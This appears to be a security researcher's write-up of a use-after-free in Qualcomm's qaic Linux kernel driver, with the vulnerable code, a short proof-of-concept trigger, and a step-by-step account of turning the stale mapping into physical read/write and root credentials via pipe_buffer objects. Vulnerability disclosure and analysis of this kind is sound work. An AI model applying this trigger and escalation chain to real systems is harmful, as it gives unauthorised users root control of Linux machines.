Privilege Escalation via a Page Use-After-Free in Qualcomm's AI Accelerator Linux Kernel Driver
Turning a stale QAIC page-table mapping into a pipe_buffer-backed physical read/write primitive.
This post is a shorter one because the resulting exploit primitive is very strong.
The vulnerability leaves behind a dangling page-table entry and therefore creates a page-level use-after-free scenario.
By reclaiming the freed physical page as a pipe_buffer slab page, that is, a page holding the kernel's pipe I/O buffer metadata, I can control the pipe_buffer objects stored there.
That gives me a physical arbitrary read/write primitive, which I use for privilege escalation on a Linux v6.18 kernel.
The bug lives in Qualcomm's Cloud AI Accelerator kernel driver, qaic, which is present in mainline Linux. I do not own the hardware because these hardware accelerators are expensive, so I virtualize the driver for exploit development. That is sufficient here because the attack does not require hardware-specific internals. I only need to map and unmap the driver's user-visible buffer object to trigger the bug. In practice, the virtualization layer only stubs out hardware-dependent initialization and teardown. This virtualization makes the vulnerability much easier to study in a controlled setup.
qaic page-level use after free.Hardware Virtualization
Before going into the exploitation details, I want to describe the virtualization setup that made the experiments possible without having access to the actual accelerator hardware.
The relevant observation is that the bug does not require executing workloads on the device.
It only requires the driver paths that allocate a buffer object, expose an mmap offset, map the backing pages into user space, unmap the Virtual Memory Area (VMA), and later free the buffer object.
Those paths are mostly kernel-side and memory-management logic, not hardware execution logic.
For the experiments, I patched qaic with a fake_online module parameter (see qaic-fake-online.patch).
When this parameter is set, the driver skips PCI probing and instead registers a synthetic parent device with root_device_register("qaic_fake").
It then creates a fake qaic_device, marks it as QAIC_ONLINE, gives it one synthetic Direct Buffer Channel (DBC), initializes the mutexes, Sleepable Read-Copy Update (SRCU) state, workqueues, waitqueues, and buffer-object lists that the normal driver paths expect, and finally registers the accel device through the existing qaic_create_drm_device path.
This is enough to get a user-visible qaic device node and to exercise the buffer-object lifecycle needed for the vulnerability.
The fake mode also avoids hardware-dependent cleanup in paths such as qaic_postclose, where the real driver would normally release users and DBC state through device-specific control paths.
In other words, the patch does not emulate the accelerator.
It only makes the driver look online enough for the allocation, mapping, unmapping, and freeing operations that matter for this bug.
With that setup, I could continue the experiments in a normal kernel test environment despite not owning the Qualcomm hardware.
That is also why this vulnerability was practical to analyze: the exploit primitive is produced by a mismatch between the driver's mapping code and the kernel's page-table teardown behavior, so the core experiment remains valid as long as the relevant qaic buffer-object and mmap paths are reachable.
The Bug
Linux represents user-space mappings through vm_area_struct objects, where each VMA describes one contiguous virtual-address range together with its permissions and mapping behavior.
For ordinary memory, this is mostly generic memory-management bookkeeping.
Device mappings are more interesting because the VMA becomes the handoff point between generic memory-management code, page-table installation, and driver-managed backing pages.
That means the kernel side and the driver side have to align on the exact mapped range and on the lifetime of the underlying physical memory.
If those assumptions diverge, stale page-table reachability to freed physical pages can follow.
In qaic, that boundary is exposed through the driver's custom mmap path.
In qaic, the relevant code path is qaic_gem_object_mmap, which walks the buffer object's scatterlist and maps each entry into the user VMA.
The important observation is that this loop never verifies that the accumulated mapping range actually stays within vma->vm_start and vma->vm_end.
static int qaic_gem_object_mmap(struct drm_gem_object *obj, struct vm_area_struct *vma)
{
struct qaic_bo *bo = to_qaic_bo(obj);
unsigned long offset = 0;
struct scatterlist *sg;
int ret = 0;
if (drm_gem_is_imported(obj))
return -EINVAL;
for (sg = bo->sgt->sgl; sg; sg = sg_next(sg)) {
if (sg_page(sg)) {
ret = remap_pfn_range(vma, vma->vm_start + offset, page_to_pfn(sg_page(sg)),
sg->length, vma->vm_page_prot);
if (ret)
goto out;
offset += sg->length;
}
}
out:
return ret;
}
qaic_gem_object_mmap maps the scatterlist entries into the user VMA without checking the full resulting range.
Listing 1 maps the pages referenced by the buffer object's scatterlist into user space.
The scatter-gather metadata is stored in an sg_table at bo->sgt, and bo->sgt->sgl is the head of the linked scatterlist entries that describe the allocated pages.
These entries may refer either to individual order-0 pages or to higher-order compound pages.
At that point, the obvious follow-up question is whether remap_pfn_range enforces that boundary for the driver.
The short answer is effectively no.
The function remap_pfn_range_internal which is internally called by remap_pfn_range_notrack computes end = addr + PAGE_ALIGN(size) from the requested size.
However, outside a special copy-on-write case, it does not check that this resulting end still lies within vma->vm_end.
In other words, for the common device-mapping case used here, the kernel largely trusts the driver to pass a sane range.
Crucially, this is not the case in this scenario.
Next, let's look at how qaic allocates the pages that later appear in the scatterlist.
static int create_sgt(struct qaic_device *qdev, struct sg_table **sgt_out, u64 size)
{
struct scatterlist *sg;
struct sg_table *sgt;
struct page **pages;
int *pages_order;
int max_order;
int nr_pages;
int ret = 0;
int i, j, k;
int order;
[...]
nr_pages = DIV_ROUND_UP(size, PAGE_SIZE);
[...]
/*
* Allocate requested memory using alloc_pages. It is possible to allocate
* the requested memory in multiple chunks by calling alloc_pages
* multiple times. Use SG table to handle multiple allocated pages.
*/
i = 0;
while (nr_pages > 0) {
order = min(get_order(nr_pages * PAGE_SIZE), max_order);
while (1) {
pages[i] = alloc_pages(GFP_KERNEL | GFP_HIGHUSER |
__GFP_NOWARN | __GFP_ZERO |
(order ? __GFP_NORETRY : __GFP_RETRY_MAYFAIL),
order);
if (pages[i])
break;
if (!order--) {
ret = -ENOMEM;
goto free_partial_alloc;
}
}
max_order = order;
pages_order[i] = order;
nr_pages -= 1 << order;
[...]
i++;
}
[...]
/* Populate the SG table with the allocated memory pages */
sg = sgt->sgl;
for (k = 0; k < i; k++, sg = sg_next(sg)) {
[...]
sg_set_page(sg, pages[k], PAGE_SIZE << pages_order[k], 0);
[...]
}
[...]
}
create_sgt can build scatterlist entries that reference higher-order compound pages.
As shown in Listing 2, create_sgt allocates pages with the pages array of different orders to match the requested page-aligned size.
It may allocate order-0 pages or higher-order compound pages and then insert them into the scatterlist as single entries whose sg->length spans multiple base pages.
Putting Listings 1 and 2 together with the missing boundary checks in remap_pfn_range gives the actual exploitable bug.
#define TARGET_BO_MAPPING (PAGE_SIZE << 10)
#define TARGET_BO_SIZE (TARGET_BO_MAPPING + (PAGE_SIZE << 3))
#define DANGLING_ADDR 0xdeadbeef000
int poc(void)
{
int fd = open_qaic("/dev/accel/accel0");
uint32_t handle = qaic_create_bo(fd, TARGET_BO_SIZE); // [1]
uint64_t mmap_offset = qaic_get_mmap_offset(fd, handle);
void *mapping = qaic_map_bo_addr(DANGLING_ADDR, fd,
TARGET_BO_MAPPING, mmap_offset); // [2]
/*
* This intentionally writes beyond the nominal VMA length to demonstrate
* that QAIC mapped more than userspace asked for.
*/
memset(mapping, 0x41, TARGET_BO_SIZE);
/*
* Keep an adjacent mapping present to stabilize page-table teardown and
* avoid losing a higher-level page table page during unmap.
*/
SYSCHK(mmap((void *)(DANGLING_ADDR + TARGET_BO_MAPPING + PAGE_SIZE),
PAGE_SIZE, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0)); // [5]
SYSCHK(munmap(mapping, TARGET_BO_MAPPING)); // [3]
qaic_free_bo(fd, handle); // [4]
}
Listing 3 shows the essential proof-of-concept sequence to trigger the vulnerability.
At [1], the PoC allocates a qaic buffer object of size TARGET_BO_SIZE.
At [2], it maps only TARGET_BO_MAPPING bytes into user space, which is intentionally smaller than the backing buffer object.
Because qaic_gem_object_mmap does not bound the scatterlist mapping against the VMA, the driver can install page-table entries for backing pages beyond the requested mapping length.
At [3], munmap() removes only the requested VMA range.
At [4], qaic_free_bo() eventually reaches the driver's buffer-object teardown and frees the full scatterlist backing.
At that point, the mappings installed beyond the requested VMA range can outlive the buffer object they originally pointed to.
The result is inconsistent page-table state: user space still has translations to physical pages that the driver has already returned to the allocator.
At [5], it places a small adjacent anonymous mapping after the target range before unmapping the original VMA.
This keeps the relevant upper-level page-table structures allocated during teardown, so the interesting leftover page-table entries (PTEs) are not lost as a side effect of freeing an otherwise empty page-table page.
Exploit Path
After the trigger, the stale mapping still points to physical pages that originally backed the qaic buffer object.
The driver has already returned those pages to the allocator, so the next step is to reclaim the same physical memory with an object whose metadata is useful to control.
Before continuing, let's recap the allocator details that matter here.
Typical Linux kernel heap allocations move through several layers that are relevant for exploitation: slab caches manage typed or size-classed objects, the per-CPU page lists (PCP) provide a fast path for recently freed pages of a given order, and the buddy allocator is the lower-level fallback.
A slab cache obtains one or more backing pages and splits that memory into object slots.
These backing pages are commonly called slab pages.
When the active slab state for a cache no longer has a suitable free slot, the allocator needs another slab page and can obtain one from PCP before falling back to buddy.
This is the scenario I want to create here: the freed qaic backing page should remain in PCP, and the next same-order slab allocation should reuse it as a slab page for the target cache.
For this exploit, I use pipe_buffer objects because they contain exactly the fields needed to redirect pipe I/O to attacker-chosen physical pages: a page pointer, an offset, and a length.
The exploit prepares many pipes before triggering the bug, then grows and fills them after freeing the qaic buffer object.
This causes the allocator to reuse the freed physical page range as a slab page containing pipe_buffer metadata.
The exploit deliberately uses an order-3 page range and reclaims it as an order-3 pipe_buffer slab page, keeping the reuse path same-order from PCP.
Since the stale user mapping still covers that physical memory, the exploit can read from and write to the reclaimed page directly.
It can then verify that the page contains plausible pipe_buffer objects, for example by checking stable-looking ops and flags fields.
Once the reclaimed page contains live pipe_buffer objects, the stale mapping becomes a way to control pipe metadata from user space.
The exploit first derives the vmemmap base from an existing pipe_buffer->page pointer.
With that base, it can translate a physical address into the corresponding struct page address.
Rewriting a controlled pipe_buffer to point at that page, with a chosen offset and length, turns normal pipe reads and writes into arbitrary physical memory reads and writes.
The privilege-escalation part then uses this physical read/write primitive directly.
First, it sanity-checks the primitive by reading physical address zero and validating the expected BIOS marker.
It then derives the randomized kernel virtual base from the leaked pipe_buffer->ops pointer, which points into anon_pipe_buf_ops.
From there, the exploit scans 2 MiB-aligned physical kernel-image candidates until it finds init_task by checking for the expected swapper/ task name.
After locating the physical kernel image, the exploit reads page_offset_base and uses it to translate direct-map virtual addresses back to physical addresses.
It then walks the global task list starting from init_task, converts each task-list pointer through the direct map, and searches for the current process by its marker comm value.
Once it finds the current task_struct, it reads the credential pointer, translates the backing cred object to a physical address, verifies the expected UID/GID values, and zeroes the credential ID fields.
At that point the process has root credentials and can spawn a root shell.
I ran these experiments in QEMU with the fake-online qaic setup described above.
The working exploit was developed and tested on Linux v6.18 built with Fedora's kernel configuration.
This setup was useful because it kept the tested kernel close to a distribution-style configuration while still letting me iterate quickly in a controlled virtual environment.
Conclusion
This bug is a good example of why driver mmap paths deserve careful boundary and lifetime checks.
The vulnerable code does not corrupt a kernel object directly.
Instead, it lets a driver install page-table entries outside the range that the VMA teardown later accounts for.
Once the backing buffer object is freed, those leftover translations become a page-level use after free.
The hardware-virtualization setup also made a practical difference.
Because the vulnerability sits in the buffer-object and mapping lifecycle, not in accelerator execution, a fake-online qaic instance was enough to keep experimenting without the physical device.
That made it possible to develop the trigger and then turn the stale physical mapping into a pipe_buffer-based physical read/write primitive.
In the end, the exploitation path is fairly direct: create a stale mapping, reclaim the freed page with useful kernel metadata, use that metadata to obtain physical memory access, and modify the current process credentials. I open-sourced the full research setup, including the exploit, virtualization patch, and build scripts, at qaic-page-uaf.
If you find this work interesting, have questions, or notice technical inaccuracies, feel free to contact me at lukas.maar@tugraz.at.